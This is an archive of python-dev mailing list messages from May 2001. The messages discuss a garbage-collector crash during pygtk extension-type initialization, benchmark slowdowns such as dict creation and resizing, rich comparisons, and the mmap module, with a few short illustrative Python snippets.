Cheers /F From skip at pobox.com Thu May 17 09:04:06 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 02:04:06 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <3B0375AD.24E039B0@lemburg.com> References: <15107.29409.242342.200378@beluga.mojam.com> <3B0375AD.24E039B0@lemburg.com> Message-ID: <15107.30694.131193.989215@beluga.mojam.com> mal> I wonder how the GC collector could "see" the type object before it mal> has been initialized... since PyGtkTreeSortable_Type is a static C mal> array and not a known PyObject until you add it to some Python mal> dictionary as type object or use it for creating instances, it mal> seems strange that the GC collector can reach out for it and get mal> hit by the fact that it is not yet properly initialized. It is actually PyGtkWidget_Type that is not yet initialized when it is placed in the bases tuple for one of its subclasses. GC traverses that tuple, then dives into each element. It hits the PyGtkWidget_Type object, whose ob_type field has not yet been initialized. The actual object whose bases tuple is being traversed is (in all the crashes I encountered), GdkDragContext. The ordering of the registration calls could perhaps be reordered. Currently GdkDragContext is patched up before GtkWidget, its base class. This code is generated by James Henstridge's wrapper code generator, so perhaps he can maintain the necessary class hierarchy relationships and insure that base classes are initialized before their subclasses. 
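One way a wrapper generator could guarantee that ordering is to emit the type fixups in a topological order of the class hierarchy. The sketch below assumes the generator has a mapping from each type name to its direct bases; the function name init_order and the example hierarchy are hypothetical and are not taken from pygtk's code generator.

```python
def init_order(bases):
    """Order type names so that every type comes after all of its bases.

    `bases` maps each type name to the names of its direct base types.
    Raises ValueError if the hierarchy contains a cycle.
    """
    order = []
    state = {}  # name -> "visiting" while on the DFS stack, "done" afterwards

    def visit(name):
        if state.get(name) == "done":
            return
        if state.get(name) == "visiting":
            raise ValueError("inheritance cycle involving " + name)
        state[name] = "visiting"
        for base in bases.get(name, ()):
            visit(base)  # initialize bases first
        state[name] = "done"
        order.append(name)

    for name in bases:
        visit(name)
    return order


# Hypothetical hierarchy, listed subclass-first to show the reordering.
hierarchy = {
    "GtkButton": ["GtkWidget"],
    "GtkWidget": ["GtkObject"],
    "GtkObject": [],
}
print(init_order(hierarchy))  # ['GtkObject', 'GtkWidget', 'GtkButton']
```

A depth-first walk is enough here because each type only needs its own bases ready; the cycle check guards against a malformed description.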
Skip From skip at pobox.com Thu May 17 09:07:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 02:07:15 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> References: <15107.29409.242342.200378@beluga.mojam.com> <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Message-ID: <15107.30883.680397.280556@beluga.mojam.com> Fredrik> footnote: this is usually done in the module init function, Fredrik> *before* the call to Py_InitModule. see: Fredrik> http://www.python.org/doc/FAQ.html#3.24 Fredrik> if the garbage collector can run after Python calls a module's Fredrik> init- function, but before that module calls back into Python, Fredrik> anything can happen... Thanks for pointing that out. Py_InitModule is indeed called before the fixup occurs. Skip From mal at lemburg.com Thu May 17 09:09:38 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 09:09:38 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> <3B0375AD.24E039B0@lemburg.com> <15107.30694.131193.989215@beluga.mojam.com> Message-ID: <3B037932.476F475A@lemburg.com> skip at pobox.com wrote: > > mal> I wonder how the GC collector could "see" the type object before it > mal> has been initialized... since PyGtkTreeSortable_Type is a static C > mal> array and not a known PyObject until you add it to some Python > mal> dictionary as type object or use it for creating instances, it > mal> seems strange that the GC collector can reach out for it and get > mal> hit by the fact that it is not yet properly initialized. > > It is actually PyGtkWidget_Type that is not yet initialized when it is > placed in the bases tuple for one of its subclasses. GC traverses that > tuple, then dives into each element. It hits the PyGtkWidget_Type object, > whose ob_type field has not yet been initialized. 
The actual object whose > bases tuple is being traversed is (in all the crashes I encountered), > GdkDragContext. The ordering of the registration calls could perhaps be > reordered. Currently GdkDragContext is patched up before GtkWidget, its > base class. This code is generated by James Henstridge's wrapper code > generator, so perhaps he can maintain the necessary class hierarchy > relationships and insure that base classes are initialized before their > subclasses. Wouldn't it be easier to simply set the ob_type fields right at the start of the initGtk() function ? This is what I do for all my extensions and I've never seen any problems with it. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From james at daa.com.au Thu May 17 09:18:23 2001 From: james at daa.com.au (James Henstridge) Date: Thu, 17 May 2001 15:18:23 +0800 (WST) Subject: [Python-Dev] Re: GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: On Thu, 17 May 2001 skip at pobox.com wrote: > > Over the past couple days I've included python-dev on various messages in an > ongoing thread about a segmentation violation I was getting with the new > PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil > Schemenauer, I finally know what's going on and I have a simple workaround > that lets me get back to work. Here's a summary of the problem. > > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime. (I'm not sure why this Windows nit > doesn't afflict other type declarations like PyTuple_Type. I'm sure others > will know why. I just accept Jim's word as gospel and move on...) Well, for Extension Classes, PyType_Type is not correct either. And because ExtensionClass is loaded at runtime, we can't set the ob_type field in the initialiser even on Unix systems. > > A problem arises if the garbage collector runs while the module > initialization function is running, but before all the ob_type fields have > been assigned their correct values. In this case, a one-element tuple > representing the bases of a particular PyGtk extension class was traversed > by the garbage collector. > > The workaround turns out to be exceedingly simple: > > import gc > gc.disable() > import gtk > gc.enable() > > I can handle doing that from Python code for the time being and will leave > it up to others to decide how, if at all, ExtensionClass should be changed > to correct the problem. Thanks for debugging this problem Skip. If we don't find a correct solution to the problem, I can put the gc disable/enable calls inside the gtk/__init__.py module. James. From mal at lemburg.com Thu May 17 09:26:32 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 09:26:32 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B037D27.E258C363@lemburg.com> Tim Peters wrote: > > [MAL] > > Since it is possible that these figures result from my specific > > machine setup, I'd like to know what other people see on their > > machines. 
> > Is this the same machine where you were able to get 15% difference a few > years ago by adding or removing an unreachable printf in ceval.c (or was that > Vladimir)? If so, I bet it's degenerated to random 50% difference since then > . That must have been Vladimir's machine... even though I do admit that some small reordering changes do result in speedups of up to 10% -- probably due to the compiler accidentally creating code which the CPU's cache management likes. > My Win98SE box is *astonishingly* useless for timings. Without fail, the > first time I run pystone after a reboot yields a result a solid 50% higher > than the second or subsequent times I run it (yes, it's major-league *slower* > the second time). This is true across dozens of trials over several months, > and across all versions of Python. On Linux the situation is somewhat different; still, I'm executing the tests 10 times each, and for the figures I posted I even ran pybench twice and only took the second readings as the basis. > And simple little loops routinely vary in reported runtime by a factor of 3. > I may have to dig my old Win95 box out of the packing crate <0.6 wink>. > > None of that changes, of course, that the numbers you got are scary. Sure are... but I'm not so much interested in the absolute numbers -- it's the hot spots which showed up that scare me: e.g. dictionary creation seems to have suffered along the way for some reason, function calls are even slower now than they were previously and other important tasks such as instance creation take a similar hit (probably as a result of the other two). When running the same test for 2.1 vs. 2.0, there's not much to notice, so the important changes seem to originate in the move from 1.5.2 to 2.0.
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From james at daa.com.au Thu May 17 09:33:17 2001 From: james at daa.com.au (James Henstridge) Date: Thu, 17 May 2001 15:33:17 +0800 (WST) Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Message-ID: On Thu, 17 May 2001, Fredrik Lundh wrote: > footnote: this is usually done in the module init function, *before* > the call to Py_InitModule. see: The PyExtensionClass_Export() function requires a pointer to the module dictionary so that it can add itself to the module. Unfortunately this requires Py_InitModule to have been called beforehand. I guess this means that the current ExtensionClass API will need to be modified in order to allow ExtensionClasses to be initialised before Py_InitModule. > > http://www.python.org/doc/FAQ.html#3.24 > > if the garbage collector can run after Python calls a module's init- > function, but before that module calls back into Python, anything > can happen... James. From mwh at python.net Thu May 17 09:43:38 2001 From: mwh at python.net (Michael Hudson) Date: 17 May 2001 08:43:38 +0100 Subject: [Python-Dev] Performance compares In-Reply-To: "M.-A. Lemburg"'s message of "Thu, 17 May 2001 09:26:32 +0200" References: <3B037D27.E258C363@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > Sure are... but I'm not so much interested in the absolute numbers > -- it's the hot-spots which showed up that scare me: e.g. dictionary > creation seems to have suffered along the way for some reason, > functions calls are even slower now than they were previously and > other important tasks such a instance creation take a similar hit > (probably as a result of the other two). Have you tried fiddling with gc parameters?
If the GC does a multi-generation trawl through the heap in the middle of some test, that might skew the numbers in unexpected ways. Or not, of course. Cheers, M. -- CLiki pages can be edited by anybody at any time. Imagine the most fearsomely comprehensive legal disclaimer you have ever seen, and double it -- http://ww.telent.net/cliki/index From mal at lemburg.com Thu May 17 11:03:06 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 11:03:06 +0200 Subject: [Python-Dev] Performance compares References: <3B037D27.E258C363@lemburg.com> Message-ID: <3B0393CA.7B0E024C@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > Sure are... but I'm not so much interested in the absolute numbers > > -- it's the hot-spots which showed up that scare me: e.g. dictionary > > creation seems to have suffered along the way for some reason, > > functions calls are even slower now than they were previously and > > other important tasks such a instance creation take a similar hit > > (probably as a result of the other two). > > Have you tried fiddling with gc parameters? If the GC does a multi > generation trawl through the heap in the middle of some test, that > might skew the numbers in unexpected ways. > > Or not, of course. No, I haven't tried fiddling with those. I'm not sure I want to either ;-) ... the reason is that applications won't switch off GC for execution, and so the test is closer to real life. Still, I'll rerun the test suite using gc.disable() and post the results.
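For anyone repeating this check on a modern Python, here is a minimal sketch that times the same statement with the cyclic collector on and off. The timeit module disables the collector while timing by default, so the gc-on run re-enables it in the setup string, as timeit's documentation suggests. The workload in STMT is a hypothetical allocation-heavy loop, not one of the pybench tests, and the resulting numbers will vary by machine.

```python
import timeit

# Hypothetical allocation-heavy workload (not a pybench test): it creates
# many small containers, which is what triggers generation-0 collections.
STMT = "d = {}\nfor i in range(200):\n    d[i] = [i]"


def best_time(stmt, gc_on, repeat=3, number=200):
    """Return the best of `repeat` timings of `number` runs of `stmt`.

    timeit turns the cyclic collector off while timing by default, so the
    gc-on measurement re-enables it in the setup code.
    """
    setup = "import gc; gc.enable()" if gc_on else "pass"
    timer = timeit.Timer(stmt, setup=setup)
    return min(timer.repeat(repeat=repeat, number=number))


with_gc = best_time(STMT, gc_on=True)
without_gc = best_time(STMT, gc_on=False)
print("gc on: %.4fs  gc off: %.4fs  ratio: %.2f"
      % (with_gc, without_gc, with_gc / without_gc))
```

Taking the minimum of several repeats reduces, but does not remove, the run-to-run noise discussed earlier in the thread.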
Lemburg) Date: Thu, 17 May 2001 11:18:36 +0200 Subject: [Python-Dev] Performance compares References: <3B037D27.E258C363@lemburg.com> <3B0393CA.7B0E024C@lemburg.com> Message-ID: <3B03976C.CF47961@lemburg.com> "M.-A. Lemburg" wrote: > > Michael Hudson wrote: > > > > "M.-A. Lemburg" writes: > > > > > Sure are... but I'm not so much interested in the absolute numbers > > > -- it's the hot-spots which showed up that scare me: e.g. dictionary > > > creation seems to have suffered along the way for some reason, > > > functions calls are even slower now than they were previously and > > > other important tasks such a instance creation take a similar hit > > > (probably as a result of the other two). > > > > Have you tried fiddling with gc parameters? If the GC does a multi > > generation trawl through the heap in the middle of some test, that > > might skew the numbers in unexpected ways. > > > > Or not, of course. > > No, I haven't tried fiddling with those. I'm not sure I want > to either ;-) ... the reason is that applications won't switch > off GC for execution and so the tests is closer to real life. > > Still, I'll rerun the test suite using gc.disable() and post the > results. Turns out, the difference is not noticable (< 1%). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From gmcm at hypernet.com Thu May 17 15:00:27 2001 From: gmcm at hypernet.com (Gordon McMillan) Date: Thu, 17 May 2001 09:00:27 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <3B03932B.8219.CCBF9F3F@localhost> [Skip] > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. > It would normally be the address of a type object (e.g. > &PyType_Type). 
However, Jim Fulton pointed out that on Windows > you can't get the address of &PyType_Type object at compile time. This is MS being passive-aggressive. If you tell MSVC the source is C++, it will magically find the address of PyType_Type at compile time, but their language lawyers apparently believe the C spec disallows this. Standards conformant and incompatible - what-MS-calls-"win-win"-ly y'rs - Gordon From guido at digicool.com Thu May 17 16:04:59 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 09:04:59 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Thu, 17 May 2001 08:12:18 +0200." <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> References: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> Message-ID: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> > I'd still be in favour of giving strings a richcompare, since it > allows to optimize what I think is the single most frequent case: > Py_EQ on strings. I have always thought that eventually (but long before Py3K!) all objects would only support rich comparisons and the __cmp__ and tp_compare slots would become completely obsolete. I realize I probably haven't expressed this thought clearly, and I'm not going to push for this to happen quickly or forcefully, but it's nevertheless how I see things. I expect it would allow a tremendous cleanup of the comparison code. It will never reach the simplicity of cmp() -- but think of Einstein's (?) rule "things should be as simple as they can be, but no simpler." Clearly cmp() was too simple. :-) Anyway, it worries me whenever I hear someone express the thought that adding rich comparisons to a particular object type would be a bad idea because it would slow things down.
--Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 17 16:37:30 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 10:37:30 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: Your message of "Thu, 17 May 2001 09:00:27 EDT." <3B03932B.8219.CCBF9F3F@localhost> References: <3B03932B.8219.CCBF9F3F@localhost> Message-ID: <200105171437.f4HEbUB09503@odiug.digicool.com> > [Skip] > > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. > > It would normally be the address of a type object (e.g. > > &PyType_Type). However, Jim Fulton pointed out that on Windows > > you can't get the address of &PyType_Type object at compile time. > > This is MS being passive-aggressive. If you tell MSVC the > source is C++, it will magically find the address of > PyType_Type at compile time, but their language lawyers > apparently believe the C spec disallows this. Standards > conformant and incompatible - > > what-MS-calls-"win-win"-ly y'rs > > - Gordon I don't think MS blames it on the language spec so much; it's probably more that they use the spec as an excuse not to fix their implementation. The problem only occurs when the definition of the symbol is in a different DLL than the reference. This is why built-in types like PyTuple_Type don't have this problem. I guess for C++ they have to do a dynamic initializer anyway, so they can make this work, but they haven't bothered to make it work for C. My other point is that Skip's problem is clearly a gtk bug: it shouldn't have exposed the type before fully initializing it. 
--Guido van Rossum (home page: http://www.python.org/~guido/) From james at daa.com.au Thu May 17 16:48:43 2001 From: james at daa.com.au (James Henstridge) Date: Thu, 17 May 2001 22:48:43 +0800 (WST) Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <200105171437.f4HEbUB09503@odiug.digicool.com> Message-ID: On Thu, 17 May 2001, Guido van Rossum wrote: > My other point is that Skip's problem is clearly a gtk bug: it > shouldn't have exposed the type before fully initializing it. On further investigation, it turned out that it was caused by a bug in my code generator that caused one extension class to be initialised before its base class (in fact, that particular extension class shouldn't have had any base classes). It was just the cyclic GC code triggering the bug. It will be fixed in the next snapshot of pygtk for GTK+ 2.0 James. -- Email: james at daa.com.au WWW: http://www.daa.com.au/~james/ From guido at digicool.com Thu May 17 16:52:54 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 10:52:54 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: Your message of "Thu, 17 May 2001 22:48:43 +0800." References: Message-ID: <200105171452.f4HEqse09691@odiug.digicool.com> > On further investigation, it turned out that it was caused by a bug in my > code generator that caused one extension class to be initialised before > its base class (in fact, that particular extension class shouldn't have > had any base classes). It was just the cyclic GC code triggering the bug. > > It will be fixed in the next snapshot of pygtk for GTK+ 2.0 Excellent news, James! I love the open source process! --Guido van Rossum (home page: http://www.python.org/~guido/) From barry at digicool.com Thu May 17 17:04:50 2001 From: barry at digicool.com (Barry A. 
Warsaw) Date: Thu, 17 May 2001 11:04:50 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <200105171452.f4HEqse09691@odiug.digicool.com> Message-ID: <15107.59538.421007.37251@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> Excellent news, James! I love the open source process! No kidding! http://perens.com/Articles/StandTogether.html :) From Barrett at stsci.edu Thu May 17 16:56:49 2001 From: Barrett at stsci.edu (Paul Barrett) Date: Thu, 17 May 2001 10:56:49 -0400 Subject: [Python-Dev] mmap module Message-ID: <3B03E6B1.A19F6594@STScI.Edu> In the CVS log of the mmapmodule.c, Tim Peters says: "The code really needs to be rethought from scratch (not by me, though ...)." Well, I might be the person to do the rethinking, but I'd first like to know what Tim has in mind. I've been playing around with this module lately and tend to agree that some enhancements could be made, particularly to prevent "bus errors" and "segmentation faults". The ability to have offsets into a file that are not multiples of the system pagesize would also be nice. I'd be willing to submit a PEP on a new mmapmodule, once I know what others would like. -- Paul -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From tim.one at home.com Thu May 17 18:02:38 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 12:02:38 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I have always thought that eventually (but long before Py3K!) all > objects would only support rich comparisons and the __cmp__ and > tp_compare slots would become completely obsolete. I realize I > probably haven't expressed this thought clearly, and I'm not going to > push for this to happen quickly or forecefully, but it's nevertheless > how I see things. 
I expect it would allow a tremendous cleanup of the > comparison code. It will never reach the simplicity of cmp() -- but > think of Einstein's (?) rule "things should be as simple as they can > be, but no simpler." Clearly cmp() was too simple. :-) > > Anyway, it worries me whenever I hear someone express the thought that > adding rich comparisons to a particular object type would be a bad > idea because it would slow things down. At the moment, "almost all" comparisons in the dynamic sense have no need of richcmps, so clearly "Clearly cmp() was too simple. :-)" was too simple . For now richcmps are a tail-wagging-the-dog phenomenon, or more like the tail growing 10 pounds of dense matted hair, making the once-frisky puppy slow to a crawl because its butt is scraping the ground . Martin and I can resolve our differences wrt strings via getting rid of old strcmp entirely. Do you like the implications? 1. Code using cmp(string1, string2) will clearly run significantly slower, calling string comparison 1 (when == obtains), 2 (when < obtains), or 3 (when > obtains) times instead of always once only. Since == is the least likely outcome when using cmp() on strings (you can conclude that by instrumenting Python, or by common sense <0.5 wink>), the number of string compare calls more than doubles in practice for string cmp()-slinging programs (which includes existing well-written tree-based lookup schemes). 2. String dictionary lookup will, unlike the general non-dict case Martin instrumented, never pass the new "are the pointers the same?" richcmp Py_EQ test (because dict lookup already makes that test inline). So if old strcmp goes away, dict lookups that have to resort to strcmp will start paying for hopeless tests. OTOH, the "pointers equal?" test looks of dubious value for the non-dict string case anyway (where it succeeded only 1 in 20 times). 
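Point 1 can be made concrete with a small Python model. This is a sketch, not CPython's C code. The hypothetical `cmp_via_rich` below emulates a 3-way cmp() by probing `==`, then `<`, then `>`. That order is assumed from the 1/2/3 call counts Tim gives. The function also counts how many comparisons each outcome costs.

```python
import operator

# Probe order assumed from the 1/2/3 call counts: (rich comparison, cmp() result).
TRIES = ((operator.eq, 0), (operator.lt, -1), (operator.gt, 1))


def cmp_via_rich(a, b, stats):
    """Emulate a 3-way cmp(a, b) using only rich comparisons.

    stats["calls"] is incremented once per rich comparison performed.
    """
    for op, outcome in TRIES:
        stats["calls"] += 1
        if op(a, b):
            return outcome
    raise TypeError("operands are not totally ordered")


if __name__ == "__main__":
    for a, b in (("spam", "spam"), ("eggs", "spam"), ("spam", "eggs")):
        stats = {"calls": 0}
        result = cmp_via_rich(a, b, stats)
        print(f"cmp({a!r}, {b!r}) = {result:2d} after {stats['calls']} comparison(s)")
```

Only the equal case costs a single comparison. When `==` is the rarest outcome, most calls pay for two or three comparisons.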
#2 is a special case that can be special-cased to death, but #1 likely applies to code using cmp() for comparisons of objects of any type, and that's the primary reason I've resisted adding richcmps to the heavily-compared types (variously string, int, float, long, and type objects). Also the case that adding "a fast path" shouldn't have to endure wading thru multiple gimmicks (kinda defeats the idea of "fast" ), so the instant *one* heavily-compared basic type grows a richcmp (there are 0 such today), all should. So that's what I'll aim at. From guido at digicool.com Thu May 17 20:18:27 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 14:18:27 -0400 Subject: [Python-Dev] IPv6 Message-ID: <200105171818.f4HIIRv12891@odiug.digicool.com> What's our IPv6 story? I recall that someone once sent me patches, but they didn't work for me. Is it time to try again? In certain circles IPv6 support in Python would be enough to switch programming languages... :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Thu May 17 21:45:29 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 21:45:29 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> > 1. Code using cmp(string1, string2) will clearly run significantly > slower, calling string comparison 1 (when == obtains), 2 (when < > obtains), or 3 (when > obtains) times instead of always once only. I'd like to question the rationale behind this procedure. If a type has both tp_compare and tp_richcompare, and the application is performing cmp(o1, o2): Why is it then a good thing to emulate 3way compare using rich compare?
I just changed the order in do_cmp, to the IMO more correct

    if (v->ob_type == w->ob_type &&
        (f = v->ob_type->tp_compare) != NULL)
        return (*f)(v, w);
    c = try_rich_to_3way_compare(v, w);
    if (c < 2)
        return c;
    c = try_3way_compare(v, w);
    if (c < 2)
        return c;
    return default_3way_compare(v, w);

With that, I got only a single failure in the test suite: test_userlist fails with

    exceptions.RuntimeError: UserList.__cmp__() is obsolete

Tim thinks this is a bug in UserList, since __cmp__ is not obsolete; I agree. According to the CVS log, this implementation of do_cmp was installed in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific rationale for doing do_cmp in that order? Regards, Martin From tim at digicool.com Fri May 18 00:55:19 2001 From: tim at digicool.com (Tim Peters) Date: Thu, 17 May 2001 18:55:19 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) Message-ID: The worst percentage hit in both MAL's and Jeremy's pybench run was (here showing Jeremy's numbers, cuz I doubt anyone could reproduce MAL's ):

    DictCreation: 87.80 ms 2.93 us +115.72%

Assorted things do not account for it: the new overhead of linking and unlinking dicts into the gc list (at creation and destruction times) seems to account for no more than 2%; and the overhead due to using the slower lookdict (as opposed to lookdict_string) even less. Jeremy cheated by running a profiler: the true cause is that dictresize gets called about twice as often.

Before 2.1: *before* inserting an item, we checked to see whether the dict was at the resize point. If so, we resized it. Note that this meant PyDict_SetItem could grow a dict even if no new entry was made (and that this was the cause of several excruciating bugs in the 2.1 release cycle, since it meant a dict could get reshuffled merely when replacing the values associated with existing keys).
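The contrast between the two rules can be simulated. The pre-2.1 rule, just described, tests before an insert. The 2.1 rule, described next, tests after a new key lands. This is a simplified model, not dictobject.c:

- it uses the resize test quoted later in the thread;
- it assumes every insert adds a new key;
- it starts from a 4-slot table and ignores the initial empty-to-4 allocation;
- it simply doubles the table on resize, whereas the real dictresize() chooses the new size differently.

`simulate` and `needs_resize` are hypothetical names.

```python
MINSIZE = 4  # smallest non-empty table size in this model


def needs_resize(fill, size):
    """The resize test quoted in the thread: mp->ma_fill*3 >= mp->ma_size*2."""
    return fill * 3 >= size * 2


def simulate(n_keys, check_after_insert):
    """Insert n_keys new keys into a MINSIZE table; return (final_size, resizes).

    check_after_insert=False models the pre-2.1 rule (test before inserting);
    check_after_insert=True models the 2.1 rule (test after a new key lands).
    Resizing just doubles the table here, which is a simplification.
    """
    size, fill, resizes = MINSIZE, 0, 0
    for _ in range(n_keys):
        if not check_after_insert and needs_resize(fill, size):
            size, resizes = size * 2, resizes + 1
        fill += 1
        if check_after_insert and needs_resize(fill, size):
            size, resizes = size * 2, resizes + 1
    return size, resizes


if __name__ == "__main__":
    for n in (3, 4):
        print(n, "keys: pre-2.1", simulate(n, False), " 2.1", simulate(n, True))
```

With 3 keys, the 2.1 rule pays one extra resize and ends with 3 of 8 slots used. With 4 keys, both rules resize once in this model.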
2.1: *after* inserting an item, and if the key was new (i.e., the dict grew a new entry, as opposed to just replacing the value associated with an existing key), and the dict is at the resize point, we resize it. Now the DictCreation test overwhelmingly creates dicts of size exactly 3. The dict resizes from empty to capacity 4 on the way to gaining 2 entries. When adding the third: Before 2.1: 2 < (2/3)*4 == 2 2/3, so the dict is not resized and ends up remaining a capacity-4 dict with 3 slots full. This actually violates a documented dict invariant (i.e., that dicts are never more than 2/3rd full). 2.1: The third item added is a new item, and 3 > (2/3)*4 == 2 2/3, so we *do* resize it, and the dict ends up with 3 of 8 slots full. I've got no interest in trying to restore the old behavior. A compromise may be to boost the minimum size of a non-empty dict from 4 to 8. As is, the only non-empty dicts that can get away with using the current minimum size of 4 have no more than 2 elements. The question is whether such tiny non-empty dicts are common enough to make everyone else pay for "an extra" resize. go-ahead-just-*try*-to-prove-your-answer-ly y'rs - tim From skip at pobox.com Fri May 18 01:21:50 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 18:21:50 -0500 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com> References: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: <15108.23822.538016.564151@beluga.mojam.com> Guido> In certain circles IPv6 support in Python would be enough to Guido> switch programming languages... :-) Sounds like someone has caught the scent of world domination... 
;-) S From jeremy at digicool.com Thu May 17 20:39:07 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Thu, 17 May 2001 14:39:07 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: References: Message-ID: <15108.6859.810306.811326@slothrop.digicool.com> Another option is to change the benchmark to put one more item in the dict. Then the same number of resizes would occur with both versions of Python. Jeremy From tim.one at home.com Fri May 18 02:08:13 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 20:08:13 -0400 Subject: [Python-Dev] mmap module In-Reply-To: <3B03E6B1.A19F6594@STScI.Edu> Message-ID: [Paul Barrett] > In the CVS log of the mmapmodule.c, Tim Peters says: > > "The code really needs to be rethought from scratch (not by me, though > ...)." That was in specific reference to the code I changed, in mmap_find_method. The difficulty is that mmap is great for "large files", but the code before my change used a C int for the starting offset and also for the return value; I boosted those to a C long, which covers 63 bits on 64-bit Linux boxes, but doesn't help 64-bit Windows at all (where a C long remains 4 bytes). The mmap_object struct uses size_t to declare the relevant members, which is possibly better still than C long, but may still leave platform capabilities out of reach for large files (e.g., "even Win95" *allows* specifying 64-bit offsets when creating a mapped file view). C is a friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue() don't cater to the full range of C integral types anyway. In other words, if this code is ever to reach its full potential, it "really needs to be rethought from scratch". > Well, I might be the person to do the rethinking, but I'd first like > to know what Tim has in mind. Nothing that you did . 
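Paul's wish for offsets that are not multiples of the page size can be approximated above the OS layer. The idea is to map from the nearest aligned offset and slice off the difference. This is a minimal sketch, assuming a modern Python 3 whose `mmap.mmap` accepts an `offset` argument and exposes `mmap.ALLOCATIONGRANULARITY`; the 2001 module had neither. `read_at` is a hypothetical helper, not part of the module.

```python
import mmap
import tempfile


def read_at(f, offset, length):
    """Return `length` bytes starting at any byte `offset` of file object `f`.

    mmap offsets must be multiples of mmap.ALLOCATIONGRANULARITY (the page
    size on most Unix systems, 64 KiB on Windows), so map from the aligned
    offset at or below `offset` and slice away the extra leading bytes.
    """
    aligned = offset - offset % mmap.ALLOCATIONGRANULARITY
    delta = offset - aligned
    with mmap.mmap(f.fileno(), delta + length,
                   access=mmap.ACCESS_READ, offset=aligned) as m:
        return m[delta:delta + length]


if __name__ == "__main__":
    with tempfile.TemporaryFile() as f:
        f.write(bytes(range(256)) * 1024)  # byte at position p has value p % 256
        f.flush()
        print(read_at(f, 70000, 4))  # 70000 % 256 == 112, so this prints b'pqrs'
```

The mapping is at most one granularity unit larger than the bytes actually requested.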
